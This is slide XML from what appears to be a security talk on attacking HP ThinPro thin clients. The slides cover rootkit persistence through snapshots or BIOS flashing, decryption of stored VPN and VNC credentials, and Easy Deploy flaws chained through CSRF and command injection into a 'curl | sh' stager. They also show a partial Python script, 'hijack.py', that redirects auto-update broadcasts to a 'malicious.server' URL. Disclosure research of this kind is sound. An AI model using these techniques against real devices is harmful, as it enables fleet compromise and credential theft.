          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3877733" y="618517"/>
            <a:ext cx="7337020" cy="5697615"/>
          </a:xfr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9126EFD8-9D05-C649-B5D2-28BFC5623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6" t="66216" r="52479" b="10088"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="643466" y="2097088"/>
            <a:ext cx="7105601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1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rootkit to disk, update existing snapshot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write rootkit into existing snapshot (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/.flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mount options varies)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12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Alternately, persist by flashing the BIOS using the flasher tool “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”, present by default on some versions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ThinPro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3504D-BA14-214A-B8AA-7036BCB70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16" t="37243" r="33265" b="42676"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2551111" y="3335061"/>
            <a:ext cx="7086600" cy="308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90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Manticore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0668E-B9AC-EE4D-9FBC-CBA123077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48" y="5905095"/>
            <a:ext cx="38782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576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Manticore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Registry of values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypts sensitive values with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RC4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be exported and imported from end points</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to distribute/deploy configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can also be used to deploy files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4195436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FF7FE0-9993-0C4B-8260-1CAADFC60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8478" y="435927"/>
            <a:ext cx="6051867" cy="5964521"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426480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E7769A-BED6-0C43-B485-8F3952967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986" t="43389" r="33857" b="30615"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1913466"/>
            <a:ext cx="10208612" cy="4030133"/>
          </a:xfr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1CEFCEBB-3ACF-AE48-9BA4-5D3FD70DDCF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6475751" y="3897443"/>
            <a:ext cx="2908092" cy="4946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87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DE82E-AFDE-D148-BD96-AEBEA07A4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23" t="13111" r="35944"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="955314" y="-1"/>
            <a:ext cx="3129005" cy="6873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E52D8A-57F6-F64D-96AE-3045578BCF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23" t="11111" r="36179" b="18000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4270418" y="211308"/>
            <a:ext cx="4911608" cy="4528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B1D0E8-4D82-B644-9063-CE9C5C0A76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39" t="23333" r="38717" b="44000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6541178" y="3820634"/>
            <a:ext cx="4770121" cy="22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3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FB50-9945-B849-8670-815322D0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B95161-56A7-D142-86BF-D58BB8A8F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878" t="7591" r="4274" b="56708"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="801373" y="1864768"/>
            <a:ext cx="10556520" cy="3871014"/>
          </a:xfr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33CAA826-27FD-4A4A-8F39-DCCCC5CE1F1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="801373" y="1864768"/>
            <a:ext cx="5003682" cy="1478570"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst>
              <a:gd name="adj1" fmla="val 29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51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line tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to query and set the local registry values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decodes encrypted strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can export and import registry values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Remember to commit changes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311410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Encrypted strings are identified by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NLCR.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RC4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cipher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shared key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So I did a little reverse engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81708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1C7F4-9A43-0442-8FEA-A28B4F786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21" y="779523"/>
            <a:ext cx="10522558" cy="5299543"/>
          </a:xfr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5F52607F-93B4-2A44-A85B-C510405F90CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8784236" y="2518348"/>
            <a:ext cx="2324031" cy="49578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1F74AF03-4520-1F43-A2BC-F656585A87B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201333" y="2548328"/>
            <a:ext cx="6129867" cy="46580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1E8957-5883-E046-8FEC-C3177DB9E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67" y="654049"/>
            <a:ext cx="7256392" cy="542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3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static key to decrypt important information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VPN credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VNC password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Root password hash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9EE76-EABF-E14E-8125-F536E7239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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771562" y="3172028"/>
            <a:ext cx="6552296" cy="135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80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B25C0-AEF8-0044-B69A-6F8EB6ED7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48" y="5905095"/>
            <a:ext cx="38782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18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7F7F9-01B5-8E42-87E1-24DC14CC5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3F8E9-57ED-4744-8228-BC70BFADD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Thin shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thin state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud connection manager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Easy Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy Update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy Deploy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Auto update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HP Device Management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76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DEPLOY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Deploys configuration over network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XML based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Listens on port 40010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”Web” interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mistakes or tinkering with the service may “brick” the device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81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DEPLOY – Known flaws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CVE-2015-2112</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Image tampering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CVE-2015-2113</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Admin password brute force</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2821023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DEPLOY – NEW FLAWS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Plaintext transport protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> deployment not validated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF-able</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write arbitrary files to disk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917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/ ZERO CLIENTS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2CE3C-80CE-934F-BC5B-D1D6EF1CE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48" y="5905095"/>
            <a:ext cx="38782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47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089B3-7AB2-804B-B54D-E6CC6EA48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48" y="5905095"/>
            <a:ext cx="38782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97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3364-3EC9-AC41-96C3-282D204CB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Code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3D796-3771-7B4F-BFAC-C61DABD90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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> via CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chain with known command injection in VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config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curl | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stager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3BB64-856D-E549-9F94-E0EBEEF84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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5196718"/>
            <a:ext cx="12192000" cy="1188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91E23-7DE4-4844-B47C-BF42C16E5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80981"/>
            <a:ext cx="12192000" cy="6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96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FLEET MANAGEMENT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B25C0-AEF8-0044-B69A-6F8EB6ED7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48" y="5905095"/>
            <a:ext cx="38782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33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Device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Enterprise management for thin clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runs on windows server, manages both Linux and Windows clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very flexible deployment options, can be spread out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Older versions does not support encrypted channels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4177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92955D-7596-2646-B792-8C61B4AF0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741" y="283900"/>
            <a:ext cx="8569841" cy="6344269"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38233026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Device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Communicates over several different ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses scheduled as tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tasks are xml based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Appears to have a checksum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compressed plaintext communications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350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Device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in progress..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Appears to have a number of race conditions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5F6869-AEF8-1647-9294-2AE4CA1E5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86101" y="3617477"/>
            <a:ext cx="24678101" cy="1975248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DB4E3A22-9300-5D4D-A657-BAEA0A07B451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8977745" y="3837709"/>
            <a:ext cx="3214255" cy="51261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87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UPDATE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AUTO UPDATE SERVER DESIGNATED VIA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CONFIG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DHCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BROADCAST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connects to a server running on port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>18287 (typically)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83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382680-5582-254F-BEE8-8EBDAE748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10" y="134619"/>
            <a:ext cx="9434830" cy="6613036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F6BE565F-24BC-DB41-8749-9A90472363F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620983" y="3255819"/>
            <a:ext cx="5818908" cy="27709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93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 BROADCAST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Wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>autoupdate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locate broadcast packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UDP, Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>18286</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>ulv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77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882B5-74D2-F347-B908-C184C3297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thin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CBC4C-5630-E54E-8629-F6E69B3D7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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>thin client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> is a lightweight computer that has been optimized for remoting into a server-based computing environment. The server does most of the work, which can include launching software programs, crunching numbers, and storing data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-AU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>--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778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application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ILSpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ftw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730549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2D848E-3556-7D4D-953B-FAFE03FD8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8879" y="32955"/>
            <a:ext cx="7540052" cy="68555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BC988F-8537-2143-99B3-7C6B9495D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45" y="3131141"/>
            <a:ext cx="10908933" cy="329575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2490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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hijack.py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62565"/>
            <a:ext cx="10146180" cy="4646949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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>#!/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>/bin/python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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>import sys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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>import socket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en-US" sz="1400" dirty="0">
              <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>if "http" not in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>[1]: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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>    print "Usage: ", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>[0], http://malicious.server/auto-update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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>    quit()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en-US" sz="1400" dirty="0">
              <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77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400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>ServerURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>[1]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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>LIP="0.0.0.0”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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>LPORT=18286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en-US" sz="1400" dirty="0">
              <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>print "Attempting to jack broadcast connections to server:", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sURL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sock = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>socket.socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>socket.AF_INET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>, # Internet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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>socket.SOCK_DGRAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>) # UDP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400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sock.bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>((LIP, LPORT))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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>while True: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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>    data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sock.recvfrom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>(1024) # buffer size is 1024 bytes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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>    print "received message:", data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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>    if "Client=" in data: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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>        print "sending message:", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sURL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77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400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sock.sendto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>sURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
